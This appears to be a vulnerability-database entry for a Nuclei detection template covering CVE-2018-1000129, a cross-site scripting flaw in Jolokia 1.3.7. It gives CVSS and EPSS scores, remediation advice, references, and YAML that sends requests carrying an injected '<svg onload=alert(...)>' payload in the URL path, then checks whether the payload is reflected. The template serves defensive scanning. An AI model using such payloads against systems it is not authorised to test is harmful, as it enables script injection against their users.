Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-1000129
HistoryJun 17, 2020 - 9:16 a.m.

Jolokia 1.3.7 - Cross-Site Scripting

2020-06-1709:16:11
ProjectDiscovery
github.com
6

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

65.3%

Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
id: CVE-2018-1000129

info:
  name: Jolokia 1.3.7 - Cross-Site Scripting
  author: mavericknerd,0h1in9e,daffainfo
  severity: medium
  description: |
    Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://jolokia.org/#Security_fixes_with_1.5.0
    - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
    - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
    - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000129
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-1000129
    cwe-id: CWE-79
    epss-score: 0.00257
    epss-percentile: 0.64818
    cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: jolokia
    product: jolokia
  tags: cve2018,cve,jolokia,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
      - "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<svg onload=alert(document.domain)>"
          - "java.lang.IllegalArgumentException"
          - "No type with name"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

65.3%